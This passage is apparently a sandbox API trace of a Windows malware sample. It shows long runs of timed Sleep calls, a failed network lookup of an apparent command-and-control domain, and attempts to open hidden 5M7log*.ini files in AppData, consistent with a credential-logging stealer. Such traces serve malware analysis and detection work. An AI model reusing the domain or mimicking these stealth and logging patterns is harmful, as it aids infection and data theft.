(dwMilliseconds=0x7d0) [0193.953] Sleep (dwMilliseconds=0x7d0) [0193.954] Sleep (dwMilliseconds=0x7d0) [0193.956] Sleep (dwMilliseconds=0x7d0) [0193.957] Sleep (dwMilliseconds=0x7d0) [0193.959] Sleep (dwMilliseconds=0x7d0) [0193.984] Sleep (dwMilliseconds=0x7d0) [0193.992] Sleep (dwMilliseconds=0x7d0) [0193.994] Sleep (dwMilliseconds=0x7d0) [0193.995] Sleep (dwMilliseconds=0x7d0) [0193.997] Sleep (dwMilliseconds=0x7d0) [0194.000] Sleep (dwMilliseconds=0x7d0) [0194.005] Sleep (dwMilliseconds=0x7d0) [0194.006] Sleep (dwMilliseconds=0x7d0) [0194.008] Sleep (dwMilliseconds=0x7d0) [0194.011] Sleep (dwMilliseconds=0x7d0) [0194.014] Sleep (dwMilliseconds=0x7d0) [0194.015] Sleep (dwMilliseconds=0x7d0) [0194.017] Sleep (dwMilliseconds=0x7d0) [0194.018] Sleep (dwMilliseconds=0x7d0) [0194.021] Sleep (dwMilliseconds=0x7d0) [0194.024] Sleep (dwMilliseconds=0x7d0) [0194.025] Sleep (dwMilliseconds=0x7d0) [0194.027] Sleep (dwMilliseconds=0x7d0) [0194.028] Sleep (dwMilliseconds=0x7d0) [0194.030] Sleep (dwMilliseconds=0x7d0) [0194.031] Sleep (dwMilliseconds=0x7d0) [0194.033] Sleep (dwMilliseconds=0x7d0) [0194.034] Sleep (dwMilliseconds=0x7d0) [0194.036] Sleep (dwMilliseconds=0x7d0) [0194.037] Sleep (dwMilliseconds=0x7d0) [0194.039] Sleep (dwMilliseconds=0x7d0) [0194.040] Sleep (dwMilliseconds=0x7d0) [0194.043] Sleep (dwMilliseconds=0x7d0) [0194.044] Sleep (dwMilliseconds=0x7d0) [0194.046] Sleep (dwMilliseconds=0x7d0) [0194.047] Sleep (dwMilliseconds=0x7d0) [0194.049] Sleep (dwMilliseconds=0x7d0) [0194.050] Sleep (dwMilliseconds=0x7d0) [0194.052] Sleep (dwMilliseconds=0x7d0) [0194.054] Sleep (dwMilliseconds=0x7d0) [0194.056] Sleep (dwMilliseconds=0x7d0) [0194.058] Sleep (dwMilliseconds=0x7d0) [0194.059] Sleep (dwMilliseconds=0x7d0) [0194.061] Sleep (dwMilliseconds=0x7d0) [0194.062] Sleep (dwMilliseconds=0x7d0) [0194.064] Sleep (dwMilliseconds=0x7d0) [0194.065] Sleep (dwMilliseconds=0x7d0) [0194.067] Sleep (dwMilliseconds=0x7d0) [0194.068] Sleep (dwMilliseconds=0x7d0) [0194.070] Sleep (dwMilliseconds=0x7d0) [0194.071] Sleep (dwMilliseconds=0x7d0) [0194.073] Sleep (dwMilliseconds=0x7d0) [0194.076] Sleep (dwMilliseconds=0x7d0) [0194.078] Sleep (dwMilliseconds=0x7d0) [0194.080] Sleep (dwMilliseconds=0x7d0) [0194.082] Sleep (dwMilliseconds=0x7d0) [0194.083] Sleep (dwMilliseconds=0x7d0) [0194.085] Sleep (dwMilliseconds=0x7d0) [0194.087] Sleep (dwMilliseconds=0x7d0) [0194.089] Sleep (dwMilliseconds=0x7d0) [0194.091] Sleep (dwMilliseconds=0x7d0) [0194.092] Sleep (dwMilliseconds=0x7d0) [0194.094] Sleep (dwMilliseconds=0x7d0) [0194.095] Sleep (dwMilliseconds=0x7d0) [0194.098] Sleep (dwMilliseconds=0x7d0) [0194.100] Sleep (dwMilliseconds=0x7d0) [0194.101] Sleep (dwMilliseconds=0x7d0) [0194.103] Sleep (dwMilliseconds=0x7d0) [0194.104] Sleep (dwMilliseconds=0x7d0) [0194.106] Sleep (dwMilliseconds=0x7d0) [0194.107] Sleep (dwMilliseconds=0x7d0) [0194.115] Sleep (dwMilliseconds=0x7d0) [0194.116] Sleep (dwMilliseconds=0x7d0) [0194.119] Sleep (dwMilliseconds=0x7d0) [0194.121] Sleep (dwMilliseconds=0x7d0) [0194.123] Sleep (dwMilliseconds=0x7d0) [0194.124] Sleep (dwMilliseconds=0x7d0) [0194.126] Sleep (dwMilliseconds=0x7d0) [0194.127] Sleep (dwMilliseconds=0x7d0) [0194.129] Sleep (dwMilliseconds=0x7d0) [0194.132] Sleep (dwMilliseconds=0x7d0) [0194.135] Sleep (dwMilliseconds=0x7d0) [0194.136] Sleep (dwMilliseconds=0x7d0) [0194.138] Sleep (dwMilliseconds=0x7d0) [0194.139] Sleep (dwMilliseconds=0x7d0) [0194.141] Sleep (dwMilliseconds=0x7d0) [0194.143] Sleep (dwMilliseconds=0x7d0) [0194.146] Sleep (dwMilliseconds=0x7d0) [0194.148] Sleep (dwMilliseconds=0x7d0) [0194.149] Sleep (dwMilliseconds=0x7d0) [0194.151] Sleep (dwMilliseconds=0x7d0) [0194.152] Sleep (dwMilliseconds=0x7d0) [0194.154] Sleep (dwMilliseconds=0x7d0) [0194.155] Sleep (dwMilliseconds=0x7d0) [0194.157] Sleep (dwMilliseconds=0x7d0) [0194.158] Sleep (dwMilliseconds=0x7d0) [0194.162] Sleep (dwMilliseconds=0x7d0) [0194.166] Sleep (dwMilliseconds=0x7d0) [0194.167] Sleep (dwMilliseconds=0x7d0) [0194.169] Sleep (dwMilliseconds=0x7d0) [0194.170] Sleep (dwMilliseconds=0x7d0) [0194.172] Sleep (dwMilliseconds=0x7d0) [0194.173] Sleep (dwMilliseconds=0x7d0) [0194.175] Sleep (dwMilliseconds=0x7d0) [0194.177] Sleep (dwMilliseconds=0x7d0) [0194.178] Sleep (dwMilliseconds=0x7d0) [0194.181] Sleep (dwMilliseconds=0x7d0) [0194.182] Sleep (dwMilliseconds=0x7d0) [0194.184] Sleep (dwMilliseconds=0x7d0) [0194.186] Sleep (dwMilliseconds=0x7d0) [0194.188] Sleep (dwMilliseconds=0x7d0) [0194.190] Sleep (dwMilliseconds=0x7d0) [0194.191] Sleep (dwMilliseconds=0x7d0) [0194.193] Sleep (dwMilliseconds=0x7d0) [0194.194] Sleep (dwMilliseconds=0x7d0) [0194.196] Sleep (dwMilliseconds=0x7d0) [0194.197] Sleep (dwMilliseconds=0x7d0) [0194.199] Sleep (dwMilliseconds=0x7d0) [0194.200] Sleep (dwMilliseconds=0x7d0) [0194.202] Sleep (dwMilliseconds=0x7d0) [0194.203] Sleep (dwMilliseconds=0x7d0) [0194.205] Sleep (dwMilliseconds=0x7d0) [0194.208] Sleep (dwMilliseconds=0x7d0) [0194.209] Sleep (dwMilliseconds=0x7d0) [0194.211] Sleep (dwMilliseconds=0x7d0) [0194.212] Sleep (dwMilliseconds=0x7d0) [0194.214] Sleep (dwMilliseconds=0x7d0) [0194.215] Sleep (dwMilliseconds=0x7d0) [0194.217] Sleep (dwMilliseconds=0x7d0) [0194.219] Sleep (dwMilliseconds=0x7d0) [0194.221] Sleep (dwMilliseconds=0x7d0) [0194.222] Sleep (dwMilliseconds=0x7d0) [0194.224] Sleep (dwMilliseconds=0x7d0) [0194.225] Sleep (dwMilliseconds=0x7d0) [0194.227] Sleep (dwMilliseconds=0x7d0) [0194.228] Sleep (dwMilliseconds=0x7d0) [0194.230] Sleep (dwMilliseconds=0x7d0) [0194.232] Sleep (dwMilliseconds=0x7d0) [0194.250] Sleep (dwMilliseconds=0x7d0) [0194.252] Sleep (dwMilliseconds=0x7d0) [0194.254] Sleep (dwMilliseconds=0x7d0) [0194.255] Sleep (dwMilliseconds=0x7d0) [0194.257] Sleep (dwMilliseconds=0x7d0) [0194.260] Sleep (dwMilliseconds=0x7d0) [0194.262] Sleep (dwMilliseconds=0x7d0) [0194.263] Sleep (dwMilliseconds=0x7d0) [0194.265] Sleep (dwMilliseconds=0x7d0) [0194.266] Sleep (dwMilliseconds=0x7d0) [0194.268] Sleep (dwMilliseconds=0x7d0) [0194.269] Sleep (dwMilliseconds=0x7d0) [0194.273] Sleep (dwMilliseconds=0x7d0) [0194.274] Sleep (dwMilliseconds=0x7d0) [0194.276] Sleep (dwMilliseconds=0x7d0) [0194.279] Sleep (dwMilliseconds=0x7d0) [0194.284] Sleep (dwMilliseconds=0x7d0) [0194.286] Sleep (dwMilliseconds=0x7d0) [0194.288] Sleep (dwMilliseconds=0x7d0) [0194.289] Sleep (dwMilliseconds=0x7d0) [0194.294] Sleep (dwMilliseconds=0x7d0) [0194.297] Sleep (dwMilliseconds=0x7d0) [0194.299] Sleep (dwMilliseconds=0x7d0) [0194.301] Sleep (dwMilliseconds=0x7d0) [0194.304] Sleep (dwMilliseconds=0x7d0) [0194.305] Sleep (dwMilliseconds=0x7d0) [0194.307] Sleep (dwMilliseconds=0x7d0) [0194.308] Sleep (dwMilliseconds=0x7d0) [0194.310] Sleep (dwMilliseconds=0x7d0) [0194.311] Sleep (dwMilliseconds=0x7d0) [0194.317] Sleep (dwMilliseconds=0x7d0) [0194.318] Sleep (dwMilliseconds=0x7d0) [0194.320] Sleep (dwMilliseconds=0x7d0) [0194.321] Sleep (dwMilliseconds=0x7d0) [0194.323] Sleep (dwMilliseconds=0x7d0) [0194.328] Sleep (dwMilliseconds=0x7d0) [0194.329] Sleep (dwMilliseconds=0x7d0) [0194.331] Sleep (dwMilliseconds=0x7d0) [0194.332] Sleep (dwMilliseconds=0x7d0) [0194.334] Sleep (dwMilliseconds=0x7d0) [0194.343] Sleep (dwMilliseconds=0x7d0) [0194.345] Sleep (dwMilliseconds=0x7d0) [0194.347] Sleep (dwMilliseconds=0x7d0) [0194.348] Sleep (dwMilliseconds=0x7d0) [0194.350] Sleep (dwMilliseconds=0x7d0) [0194.351] Sleep (dwMilliseconds=0x7d0) [0194.353] Sleep (dwMilliseconds=0x7d0) [0194.354] Sleep (dwMilliseconds=0x7d0) [0194.356] Sleep (dwMilliseconds=0x7d0) [0194.360] Sleep (dwMilliseconds=0x7d0) [0194.361] Sleep (dwMilliseconds=0x7d0) [0194.363] Sleep (dwMilliseconds=0x7d0) [0194.364] Sleep (dwMilliseconds=0x7d0) [0194.367] Sleep (dwMilliseconds=0x7d0) [0194.368] Sleep (dwMilliseconds=0x7d0) [0194.372] Sleep (dwMilliseconds=0x7d0) [0194.373] Sleep (dwMilliseconds=0x7d0) [0194.375] Sleep (dwMilliseconds=0x7d0) [0194.513] Sleep (dwMilliseconds=0x7d0) [0194.514] Sleep (dwMilliseconds=0x7d0) [0194.516] Sleep (dwMilliseconds=0x7d0) [0194.517] Sleep (dwMilliseconds=0x7d0) [0194.520] Sleep (dwMilliseconds=0x7d0) [0194.522] Sleep (dwMilliseconds=0x7d0) [0194.526] Sleep (dwMilliseconds=0x7d0) [0194.528] Sleep (dwMilliseconds=0x7d0) [0194.529] Sleep (dwMilliseconds=0x7d0) [0194.531] Sleep (dwMilliseconds=0x7d0) [0194.532] Sleep (dwMilliseconds=0x7d0) [0194.536] Sleep (dwMilliseconds=0x7d0) [0194.540] Sleep (dwMilliseconds=0x7d0) [0194.541] Sleep (dwMilliseconds=0x7d0) [0194.543] Sleep (dwMilliseconds=0x7d0) [0194.544] Sleep (dwMilliseconds=0x7d0) [0194.548] Sleep (dwMilliseconds=0x7d0) [0194.550] Sleep (dwMilliseconds=0x7d0) [0194.551] Sleep (dwMilliseconds=0x7d0) [0194.553] Sleep (dwMilliseconds=0x7d0) [0194.554] Sleep (dwMilliseconds=0x7d0) [0194.556] Sleep (dwMilliseconds=0x7d0) [0194.557] Sleep (dwMilliseconds=0x7d0) [0194.559] Sleep (dwMilliseconds=0x7d0) [0194.560] Sleep (dwMilliseconds=0x7d0) [0194.562] Sleep (dwMilliseconds=0x7d0) [0194.605] Sleep (dwMilliseconds=0x7d0) [0194.640] Sleep (dwMilliseconds=0x7d0) [0194.643] Sleep (dwMilliseconds=0x7d0) [0194.648] Sleep (dwMilliseconds=0x7d0) [0194.649] Sleep (dwMilliseconds=0x7d0) [0194.651] Sleep (dwMilliseconds=0x7d0) [0194.652] Sleep (dwMilliseconds=0x7d0) [0194.654] Sleep (dwMilliseconds=0x7d0) [0194.658] Sleep (dwMilliseconds=0x7d0) [0194.660] Sleep (dwMilliseconds=0x7d0) [0194.662] Sleep (dwMilliseconds=0x7d0) [0194.663] Sleep (dwMilliseconds=0x7d0) [0194.664] Sleep (dwMilliseconds=0x7d0) [0194.669] Sleep (dwMilliseconds=0x7d0) [0194.671] Sleep (dwMilliseconds=0x7d0) [0194.673] Sleep (dwMilliseconds=0x7d0) [0194.674] Sleep (dwMilliseconds=0x7d0) [0194.675] Sleep (dwMilliseconds=0x7d0) [0194.677] Sleep (dwMilliseconds=0x7d0) [0194.679] Sleep (dwMilliseconds=0x7d0) [0194.680] Sleep (dwMilliseconds=0x7d0) [0194.683] Sleep (dwMilliseconds=0x7d0) [0194.684] Sleep (dwMilliseconds=0x7d0) [0194.685] Sleep (dwMilliseconds=0x7d0) [0194.687] Sleep (dwMilliseconds=0x7d0) [0194.717] Sleep (dwMilliseconds=0x7d0) [0194.718] Sleep (dwMilliseconds=0x7d0) [0194.720] Sleep (dwMilliseconds=0x7d0) [0194.721] Sleep (dwMilliseconds=0x7d0) [0194.723] Sleep (dwMilliseconds=0x7d0) [0194.725] Sleep (dwMilliseconds=0x7d0) [0194.726] Sleep (dwMilliseconds=0x7d0) [0194.727] Sleep (dwMilliseconds=0x7d0) [0194.729] Sleep (dwMilliseconds=0x7d0) [0194.730] Sleep (dwMilliseconds=0x7d0) [0194.732] Sleep (dwMilliseconds=0x7d0) [0194.736] Sleep (dwMilliseconds=0x7d0) [0194.737] Sleep (dwMilliseconds=0x7d0) [0194.739] Sleep (dwMilliseconds=0x7d0) [0194.740] Sleep (dwMilliseconds=0x7d0) [0194.742] Sleep (dwMilliseconds=0x7d0) [0194.746] Sleep (dwMilliseconds=0x7d0) [0194.747] Sleep (dwMilliseconds=0x7d0) [0194.749] Sleep (dwMilliseconds=0x7d0) [0194.750] Sleep (dwMilliseconds=0x7d0) [0194.752] Sleep (dwMilliseconds=0x7d0) [0194.753] Sleep (dwMilliseconds=0x7d0) [0194.755] Sleep (dwMilliseconds=0x7d0) [0194.756] Sleep (dwMilliseconds=0x7d0) [0194.758] Sleep (dwMilliseconds=0x7d0) [0194.759] Sleep (dwMilliseconds=0x7d0) [0194.761] Sleep (dwMilliseconds=0x7d0) [0194.762] Sleep (dwMilliseconds=0x7d0) [0194.764] Sleep (dwMilliseconds=0x7d0) [0194.769] Sleep (dwMilliseconds=0x7d0) [0194.770] Sleep (dwMilliseconds=0x7d0) [0194.772] Sleep (dwMilliseconds=0x7d0) [0194.773] Sleep (dwMilliseconds=0x7d0) [0194.775] Sleep (dwMilliseconds=0x7d0) [0194.779] Sleep (dwMilliseconds=0x7d0) [0194.830] Sleep (dwMilliseconds=0x7d0) [0194.831] Sleep (dwMilliseconds=0x7d0) [0194.833] Sleep (dwMilliseconds=0x7d0) [0194.834] Sleep (dwMilliseconds=0x7d0) [0194.836] Sleep (dwMilliseconds=0x7d0) [0194.837] Sleep (dwMilliseconds=0x7d0) [0194.839] Sleep (dwMilliseconds=0x7d0) [0194.840] Sleep (dwMilliseconds=0x7d0) [0194.844] Sleep (dwMilliseconds=0x7d0) [0194.848] Sleep (dwMilliseconds=0x7d0) [0194.850] Sleep (dwMilliseconds=0x7d0) [0194.851] Sleep (dwMilliseconds=0x7d0) [0194.853] Sleep (dwMilliseconds=0x7d0) [0194.856] Sleep (dwMilliseconds=0x7d0) [0194.858] Sleep (dwMilliseconds=0x7d0) [0194.859] Sleep (dwMilliseconds=0x7d0) [0194.861] Sleep (dwMilliseconds=0x7d0) [0194.862] Sleep (dwMilliseconds=0x7d0) [0194.868] Sleep (dwMilliseconds=0x7d0) [0194.869] Sleep (dwMilliseconds=0x7d0) [0194.871] Sleep (dwMilliseconds=0x7d0) [0194.872] Sleep (dwMilliseconds=0x7d0) [0194.874] Sleep (dwMilliseconds=0x7d0) [0194.875] Sleep (dwMilliseconds=0x7d0) [0194.877] Sleep (dwMilliseconds=0x7d0) [0194.878] Sleep (dwMilliseconds=0x7d0) [0194.880] Sleep (dwMilliseconds=0x7d0) [0194.882] Sleep (dwMilliseconds=0x7d0) [0194.883] Sleep (dwMilliseconds=0x7d0) [0194.886] Sleep (dwMilliseconds=0x7d0) [0194.887] Sleep (dwMilliseconds=0x7d0) [0194.889] Sleep (dwMilliseconds=0x7d0) [0194.890] Sleep (dwMilliseconds=0x7d0) [0194.892] Sleep (dwMilliseconds=0x7d0) [0194.893] Sleep (dwMilliseconds=0x7d0) [0194.895] Sleep (dwMilliseconds=0x7d0) [0194.897] Sleep (dwMilliseconds=0x7d0) [0194.898] Sleep (dwMilliseconds=0x7d0) [0194.900] Sleep (dwMilliseconds=0x7d0) [0194.901] Sleep (dwMilliseconds=0x7d0) [0194.903] Sleep (dwMilliseconds=0x7d0) [0194.904] Sleep (dwMilliseconds=0x7d0) [0194.906] Sleep (dwMilliseconds=0x7d0) [0194.908] Sleep (dwMilliseconds=0x7d0) [0194.909] Sleep (dwMilliseconds=0x7d0) [0194.911] Sleep (dwMilliseconds=0x7d0) [0194.913] Sleep (dwMilliseconds=0x7d0) [0194.914] Sleep (dwMilliseconds=0x7d0) [0194.916] Sleep (dwMilliseconds=0x7d0) [0194.917] Sleep (dwMilliseconds=0x7d0) [0194.919] Sleep (dwMilliseconds=0x7d0) [0194.920] Sleep (dwMilliseconds=0x7d0) [0194.922] Sleep (dwMilliseconds=0x7d0) [0194.945] Sleep (dwMilliseconds=0x7d0) [0194.976] socket (af=2, type=1, protocol=6) returned 0x1d10 [0194.976] getaddrinfo (in: pNodeName="www.sans-gluten.store", pServiceName="80", pHints=0x9e760d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e76108 | out: ppResult=0x9e76108*=0x0) returned 11001 [0195.149] Sleep (dwMilliseconds=0x7d0) [0195.172] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.172] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.172] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0195.172] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0fb520) returned 1 [0195.172] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.172] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.172] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0195.172] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0fa050) returned 1 [0195.172] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.173] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.173] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0195.173] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9c60) returned 1 [0195.173] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.173] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.173] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0195.173] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9f30) returned 1 [0195.173] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.173] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.173] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0195.173] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9bd0) returned 1 [0195.173] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.173] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.173] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0195.173] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9bd0) returned 1 [0195.173] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.173] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.174] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0195.174] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9bd0) returned 1 [0195.174] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.174] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0195.174] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: 